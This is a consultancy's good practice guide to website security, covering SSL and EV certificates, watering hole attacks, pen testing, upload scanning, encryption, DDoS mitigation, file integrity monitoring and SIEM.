Website Security: A good practice guide
Not all digital
Certificates are
equal!
If 2011 was the year of
the breach, then 2013
can best be described
as the year of the
Mega Breach!
Authors: Computer Security Technology Ltd (CSTL) is a London based independent IT security specialist with over 15 years of experience. CSTL supply solutions, services, and advice to safeguard business data. Through the protection of systems, CSTL drives user productivity and good governance.
This guide is designed to provide suggestions and recommendations for organisations with a website presence that is deemed to be vital to its business function. Where a website is needed to be robust and secure, whilst ensuring visitors are also safeguarded and feel confident with its usage.
1. Protect your customer's entire website by deploying SSL on all your web pages. SSL (Secure Socket Layer) is a protocol to encrypt information traffic to and from your website, for SSL to function adequately; it requires a digital certificate that uses the concept of a Private and Public key exchange. By using SSL you can be sure that visitors to your website are protecting information being shared, whilst
instilling confidence because you are using a trusted and well recognised digital certificate. 2. Build customer trust with the “green browser bar” by using SSL Certificates with ‘Extended
Validation’ to secure public facing web servers, and display recognised trust marks in highly visible locations on your website. The “green browser bar” is a simple method for people to identify that a website is using encryption to protect information being exchanged, and as it becomes more widely recognised, it makes sense to modify your website to ensure visitors do not terminate access. You can see how the green bar functions if you visit the Lloyds Bank website (address http://www.lloydsbank.com/) at this site the address bar is normal, but once you click on the logon button as if you were going to access the online banking portal, you will see the web bar changes to green (safe) along with the visible appearance of the padlock (address
https://online.lloydsbank.co.uk/personal/logon/login.jsp?WT.ac=PLO0512 ).
Note – it is now becoming an accepted ‘check’ that by hovering on the padlock itself, you can view a summary of the digital certificate, in this case confirming it is indeed Lloyds bank.
Website Security: A good practice guide
This green browser bar is termed Extended Validation (EV) and having Digital certificates with EV will ensure your website is never distrusted or dropped due to visitors expecting to be greeted with this symbol of security.3. Watch for attempted connections to known malicious or suspicious hosts from your servers. The virus authors and cyber criminals have realised that dropping their malicious payload onto specific targets takes time; instead they are infecting web sites that are trusted, and more likely to be visited by their ultimate targets. These are termed “watering hole” attacks based on the analogy that a predator rather than hunting its prey, would rather hide at the location its prey are likely to visit – the targets come to them! The latest ISTR (Internet Security Threat Report) shows: 77 percent of legitimate websites had exploitable vulnerabilities, and 1-in-8 of all websites had a critical vulnerability. This gives attackers plenty of choices in websites to place their malware and entrap their victims (that could well be your Customers).
4. Implement physical security to protect your assets from theft. This may sound obvious; however, security breaches are not always due to complicated attacks, instead they are due to simple oversight and tardiness. Ensuring the physical location of where the website server is hosted is safe from unauthorised entry, will support these security policies: meaning no unauthorised changes to the website, no loss of data due to physical theft, and no loss of data due to localised media abuse. If you sub-contract the hosting to a third party, the cloud, or use a commercial datacentre, ensure that you:
Ask them to confirm their security arrangements.
Find out if they meet your minimum security requirements, ideally they should exceed them!
Ask for copies of the latest and previous security audit results.
Request all of the above on a regular schedule basis, not just when the service commences. Have a security mandate built into their contract with formal security SLA’s.
Ensure they are obligated to inform you of all breaches to their data centres within a defined timescale, and not breaches just to your web servers.
5. Use separate Test Signing and Release Signing infrastructures. The best security can fail due to best intentions, for instance a development team rushing out a new web application or site update to meet commercial demands, whilst in the rush not meeting every validation and testing step. The “in development” suddenly appears “in production”; not noticed till the breach! Segregating and using different ‘Test’ and ‘Released’ certificates will allow rogue website updates to be quickly and easily identified, passing release control back to the correct parties, enforcing change regulation. If you accept the axiom “It costs a penny to build security into the design, a pound to insert afterwards, and £100 to rework it” then preventing an untested release will save on resources and intrinsic cost.
Website Security: A good practice guide
Does it surprise you that
approximately 67 percent
of websites used to
distribute malware were
identified as
legitimate
,
compromised websites!?
6. Trust you digital certificates. Use an established, trustworthy Certificate Authority who demonstrates excellent security practices. A certificate is really only as good as the authority that issues it, like a house built on poor foundations, it may function for a short while, but it’s a matter of time before the structure fails. With certificates the integrity is the key to its robustness; to what extent does the authority undertake the background checks on the requestor, has the authority deployed sufficient security and safeguards to protect against miss issue, certificate fraud, and system compromises. Revoking a certificate after its been deployed due to the user making a mistake can be a costly exercise; like the house analogy above, it would be more effective to get it right first time as with the phrase “pay cheap, pay twice”.
7. Defend your website; against malware infection, cyber-attacks & threat propagation.
The chart below demonstrates that the number of vulnerabilities continues to grow; providing would be attackers a rich and diverse pool of exploits to use against your website (Source ISTR 2014).
a. Ensure any file transfer to or from your website is scanned prior to the file being stored or processed. Solutions now exist that scan the actual file transfer stream, and scan within proprietary storage systems (that would otherwise be skipped). Does your site allow the public for instance to upload files? If it does, then preventing the file from making contact with your site is a good practise, you don’t want to be removing and
Website Security: A good practice guide
elsewhere and preferably out of your perimeter ingress points all together. A good example is a business that provides loans, where brokers submit loan requests along with supporting documentation through the website, the requests and documentation are routed to internal systems for automated processing. It’s only at this point that if standard Anti-Virus was running would the threat be detected, cleaned, and deleted if possible. Typically resulting in Production systems being brought offline, affecting not just that loan request but every other loan request that is due for processing on that same host! It would be far better to inform the brokers as they submit the documents, and before the documents make it to the website; effectively passing the problem of clean-up, back to the brokers. The same usage scenario can be applied for sites that allow CV’s to be uploaded, or websites that provide a portal for lodging Customer Support type requests; if a document can be copied to a website, it should have scanning applied before it reaches the website; not afterwards.b. Undertake regular vulnerability assessments (VA) and periodic Penetrating (Pen) testing of web servers, and web applications to detect exploitable conditions. Pen testing should be undertaken on a regular basis by ethical engineers to mimic an attack, and identify how an attack could be successful. It is obviously better to have the vulnerability detected benignly, rather than exploited by a real attacker. Consider using a pen tester that conforms to UK industry standards and has been vetted by an organisation such as CREST. It’s also important that a pen test is not confused with a Vulnerability Assessment (VA). A good Pen tester should use a multitude of VA tools to identify possible weaknesses, and then have the skills to exploit these weaknesses to mimic a real attack; additionally the pen tester should have sufficient experience to call on, allowing them to compromise a system that would seemingly be un-vulnerable. It’s good practise to have weekly automated VA scans of all systems, along with an annual pen test to check perimeter ingress routes, web application build strength, and high risk/high value systems. The combination of on-going VA and periodic Pen testing supports the “security in-depth” approach to eliminate single points of failure, and provide a robust risk reduction strategy.
c. Use encryption to store and transfer sensitive data processed to and from your website. Encryption is the best method to reduce the risk of data leakage for your website. Encryption-at-rest deals with encrypting data that is being stored on your systems, whilst Encryption-in-transit as it suggests deal with encrypting the path from one location to another (such as SSL or VPN’s) or encrypting as the transfer is initiated, and decrypted at the target recipient. It’s not uncommon for websites to have sensitive information stored by accident, such as customer address records that were upload for a web site function, and never removed. Or historical credit card details that been long forgotten. Note; using the pen testing services mentioned previously to conduct a sensitive data inventory of the website, is another good practise to make a habit.
Website Security: A good practice guide
8. Plan and Protect for Distributed Denial of Service (DDoS) Attacks:A man recently from the US was given two years federal probation and a hefty fine of some £120,000 for his part in a DDoS attack against a multinational corporation, the objective was to disrupt the business functions by preventing its website from working. Unfortunately only a small number of these attackers are actually caught. DDoS attacks come in three main types: Volumetric, Application, and State exhaustion. Volumetric attacks utilise your internet bandwidth for non-productive usage to the point nil legitimate bandwidth exists for the website to function. As such placing DDoS mitigation solutions at the business gateway are pointless as the internet pipe is already compromised, it’s better to use a solution based in the cloud that can switch attack traffic away from the web host, thus allowing legitimate traffic to continue on to the website as normal. Application and State DDoS attacks both use similar attacks to exhaust a protocol to the point it no longer functions, or to fill the temporary memory with information that cannot be processed, thus preventing legitimate actions to take place. To defend against these attacks it’s recommended that the host systems be hardened to resist such an attack (see VA and pen testing) and to place systems that can detect and drop these types of attack connections. The best solution encompasses a combination of on-site and cloud based DDoS solutions to deal with all types of risks.
9. Lock down key system resources. Prevent inadvertent or malicious changes to defend against website defacement and confidential data loss. Consider solutions that provide File Integrity Monitoring (FIM) and system hardening. Such technologies are termed Host Intrusion Detection (HIDS), solutions that actively monitor the events and activity of a host, in this situation, the website application. Typically it would make periodic comparison to see if the stored encrypted image of the website matches that of the production site image. Any disparity is an unauthorised change allowing you to determine if it was merely a legitimate change being made without due change control authority, or a real threat like web defacement, the installation of a malicious hacking trojan or malware.
Website Security: A good practice guide
10. Monitor your infrastructure for network intrusions, propagation attempts, and other suspicioustraffic patterns. The firewall is a good place to start proactively reviewing and analysing traffic logs or events to detect suspicious activity. A step forward would be to utilise a Network Intrusion Detection System (NIDS) or to use a SIEM (Security Incident Event Monitoring) solution to collect logs from across the network, giving you a complete picture of activity. Many organisations state that they look at firewall logs after suspicious activity, which in effect means that seldom do, and when they do, it’s too late anyway. Conversely a common claim is that they have lots of data, and little information. In both situations having the technology to automatically collect, categorise and alert; (such as SIEM technology) would provide great benefits to the protection and integrity of the website. Some technologies include website analytics with Security Incident Detection to ensure that production as well as security issues can be analysed for completeness.
